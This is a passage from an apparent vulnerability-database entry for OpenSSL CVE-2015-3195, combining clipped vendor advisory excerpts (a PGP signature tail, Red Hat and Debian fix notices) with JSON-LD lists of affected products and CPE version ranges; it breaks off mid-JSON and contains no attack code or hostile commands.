iQIcBAEBCgAGBQJW8JQFAAoJEBcWfLTuOo7tZSYP/1bHFA1qemkD37uu7nYpk/q6 ARVsPgME1I1+5tOxX0TQJgzMBmdQsKYdsTiLpDk5HTuv+dAMsFfasaUItGk8Sz1w HiYjSfVsxL+Pjz3vK8/4/fsi2lX6472MElRw8gudITOhXtniGcKo/vuA5dB+vM3l Jy1NLHHhZ6BD2t0bBmlz41mZMG3AMxal2wfqE+5LkjUwASzcvC/3B1sh7Fntwyau /71vIgMQ5AaETdgQJAuQivxPyTlFduBRgLjqvPiB9eSK4Ctu5t/hErFIrP2NiDCi UhfZC48XbiRjJfkUsUD/5TIKnI+jkZxOnch9ny32dw2kUIkbIAbqufTkzsMXOpng O+rI93Ni7nfzgI3EkI2bq+C+arOoRiveWuJvc3SMPD5RQHo4NCQVs0ekQJKNHF78 juPnY29n8WMjwLS6Zfm+bH+n8ELIXrmmEscRztK2efa9S7vJe+AgIxx7JE/f8OHF i9K7UQBXFXcpMjXi1aTby/IUnpL5Ny4NVwYwIhctj0Mf6wTH7uf/FMWYIQOXcIfP Izo+GXxNeLd4H2ypZ+UpkZg/Sn2mtCd88wLc96+owlZPBlSqWl3X1wTlp8i5FP2X qlQ7RcTHJDv8jPT/MOfzxEK1n/azp45ahHA0o6nohUdxlA7PLci9vPiJxqKPo/0q VZmOKa8qMxB1L/JmdCqy =mZR+ -----END PGP SIGNATURE----- .

The References section of this erratum contains a download link (you must log in to download the update). (CVE-2014-8176, CVE-2015-0209, CVE-2015-0286, CVE-2015-3194, CVE-2015-3195, CVE-2015-3196, CVE-2015-3216, CVE-2016-0702, CVE-2016-0705, CVE-2016-0797, CVE-2016-0799, CVE-2016-2105, CVE-2016-2106, CVE-2016-2107, CVE-2016-2108, CVE-2016-2109, CVE-2016-2177, CVE-2016-2178, CVE-2016-2842)

This update fixes several flaws in libxml2. (CVE-2016-1762, CVE-2016-1833, CVE-2016-1834, CVE-2016-1835, CVE-2016-1836, CVE-2016-1837, CVE-2016-1838, CVE-2016-1839, CVE-2016-1840, CVE-2016-3627, CVE-2016-3705, CVE-2016-4447, CVE-2016-4448, CVE-2016-4449, CVE-2016-4483)
This update fixes three flaws in curl. (CVE-2016-5419, CVE-2016-5420, CVE-2016-7141)
This update fixes two flaws in httpd. (CVE-2014-3523, CVE-2015-3185)
This update fixes two flaws in mod_cluster. (CVE-2016-4459, CVE-2016-8612)
A buffer overflow flaw when concatenating virtual host names and URIs was fixed in mod_jk. (CVE-2016-6808)
A memory leak flaw was fixed in expat.

After installing the updated packages, the httpd daemon will be restarted automatically. JIRA issues fixed (https://issues.jboss.org/):

JBCS-50 - CVE-2012-1148 CVE-2012-0876 expat: various flaws [jbews-3.0.0] JBCS-95 - CVE-2014-3523 httpd: WinNT MPM denial of service

5 client) - i386, x86_64
Description:

OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library. Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied. The Common Vulnerabilities and Exposures project identifies the following issues:

CVE-2015-3194

Loic Jonas Etienne of Qnective AG discovered that the signature
verification routines will crash with a NULL pointer dereference if
presented with an ASN.1 signature using the RSA PSS algorithm and
absent mask generation function parameter. A remote attacker can
exploit this flaw to crash any certificate verification operation
and mount a denial of service attack.

CVE-2015-3196

A race condition flaw in the handling of PSK identify hints was
discovered, potentially leading to a double free of the identify
hint data.

For the oldstable distribution (wheezy), these problems have been fixed in version 1.0.1e-2+deb7u18.

For the stable distribution (jessie), these problems have been fixed in version 1.0.1k-3+deb8u2.

For the unstable distribution (sid), these problems have been fixed in version 1.0.2e-1 or earlier

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201512-0484",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "transportation management",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "oracle",
        "version": "6.2"
      },
      {
        "model": "transportation management",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "oracle",
        "version": "6.1"
      },
      {
        "model": "sun ray software",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "oracle",
        "version": "11.1"
      },
      {
        "model": "exalogic infrastructure",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "oracle",
        "version": "1.0"
      },
      {
        "model": "exalogic infrastructure",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "oracle",
        "version": "2.0"
      },
      {
        "model": "life sciences data hub",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "oracle",
        "version": "2.1"
      },
      {
        "model": "api gateway",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "oracle",
        "version": "11.1.2.4.0"
      },
      {
        "model": "api gateway",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "oracle",
        "version": "11.1.2.3.0"
      },
      {
        "model": "1.0.1",
        "scope": null,
        "trust": 1.2,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "15.04"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "15.10"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "6"
      },
      {
        "model": "vm server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "3.2"
      },
      {
        "model": "openssl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2e"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "10"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "13.1"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "22"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "11.4"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.4"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "communications webrtc session controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "7.2"
      },
      {
        "model": "communications webrtc session controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "7.0"
      },
      {
        "model": "mac os x",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "apple",
        "version": "10.11.4"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.1q"
      },
      {
        "model": "vm virtualbox",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.0.14"
      },
      {
        "model": "http server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "11.5.10.2"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "13.2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "7"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "0.9.8zh"
      },
      {
        "model": "vm virtualbox",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.0.0"
      },
      {
        "model": "integrated lights out manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "3.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "7.0"
      },
      {
        "model": "openssl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.2"
      },
      {
        "model": "integrated lights out manager",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.0.4"
      },
      {
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "42.1"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "11.3"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "communications webrtc session controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "7.1"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.3.36"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "5.0"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.7"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.0t"
      },
      {
        "model": "openssl",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.0"
      },
      {
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "8.53"
      },
      {
        "model": "hpe systems insight manager",
        "scope": null,
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": null
      },
      {
        "model": "sun blade 6000 ethernet switched nem 24p 10ge",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "1.2"
      },
      {
        "model": "primavera p6 enterprise project portfolio management",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "8.3"
      },
      {
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "8.55"
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "apple",
        "version": "10.11 to  10.11.3"
      },
      {
        "model": "mysql",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "5.7.10 and earlier"
      },
      {
        "model": "hpe server migration pack",
        "scope": null,
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": null
      },
      {
        "model": "communications applications",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "of  oracle enterprise session border controller ecz7.3m1p4 and earlier"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.0"
      },
      {
        "model": "mysql",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "5.6.28 and earlier"
      },
      {
        "model": "e-business suite",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "11.5.10.2"
      },
      {
        "model": "hpe insight control",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "none"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.1q"
      },
      {
        "model": "peoplesoft enterprise peopletools",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "8.54"
      },
      {
        "model": "communications network charging and control",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "4.4.1.5.0"
      },
      {
        "model": "hpe version control repository manager",
        "scope": null,
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": null
      },
      {
        "model": "enterprise manager ops center",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "12.2.2"
      },
      {
        "model": "primavera p6 enterprise project portfolio management",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "15.2"
      },
      {
        "model": "hpe matrix operating environment",
        "scope": null,
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": null
      },
      {
        "model": "switch es1-24",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "1.3"
      },
      {
        "model": "communications network charging and control",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "5.0.0.2.0"
      },
      {
        "model": "communications network charging and control",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "5.0.2.0.0"
      },
      {
        "model": "primavera p6 enterprise project portfolio management",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "8.4"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.0t"
      },
      {
        "model": "enterprise manager ops center",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "12.3.2"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.2e"
      },
      {
        "model": "40g 10g 72/64 ethernet switch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "2.0.0"
      },
      {
        "model": "openssl",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "jd edwards enterpriseone tools",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "9.2.0.5"
      },
      {
        "model": "primavera p6 enterprise project portfolio management",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "15.1"
      },
      {
        "model": "system management homepage",
        "scope": null,
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": null
      },
      {
        "model": "sun network 10ge switch 72p",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "1.2"
      },
      {
        "model": "communications network charging and control",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "5.0.0.1.0"
      },
      {
        "model": "enterprise manager ops center",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "12.1.4"
      },
      {
        "model": "communications network charging and control",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "5.0.1.0.0"
      },
      {
        "model": "hpe insight control",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "server provisioning"
      },
      {
        "model": "\u003c0.9.8zh",
        "scope": null,
        "trust": 0.6,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "1.0.2",
        "scope": null,
        "trust": 0.6,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "openssl",
        "version": "1.0.0k"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "openssl",
        "version": "1.0.0s"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "openssl",
        "version": "1.0.0j"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "openssl",
        "version": "1.0.0r"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "openssl",
        "version": "1.0.0q"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "openssl",
        "version": "1.0.0m"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "openssl",
        "version": "1.0.0l"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "openssl",
        "version": "1.0.0n"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "openssl",
        "version": "1.0.0o"
      },
      {
        "model": "openssl",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "openssl",
        "version": "1.0.0i"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2015-07950"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-006116"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201512-075"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3195"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "10.11.4",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:oracle:sun_ray_software:11.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:transportation_management:6.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:life_sciences_data_hub:2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:transportation_management:6.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:api_gateway:11.1.2.3.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:exalogic_infrastructure:1.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:api_gateway:11.1.2.4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:exalogic_infrastructure:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:oracle:solaris:10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_webrtc_session_controller:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:communications_webrtc_session_controller:7.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.0.14",
                "versionStartIncluding": "5.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:oracle:linux:5:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:vm_server:3.2:*:*:*:*:*:x86:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:oracle:linux:6:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:oracle:linux:7:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:vm_virtualbox:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.3.36",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:oracle:http_server:11.5.10.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:oracle:integrated_lights_out_manager_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "4.0.4",
                "versionStartIncluding": "3.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "0.9.8zh",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "1.0.0t",
                "versionStartIncluding": "1.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "1.0.1q",
                "versionStartIncluding": "1.0.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "1.0.2e",
                "versionStartIncluding": "1.0.2",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:5.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:11.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:linux_enterprise_server:10:sp4:*:*:ltss:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
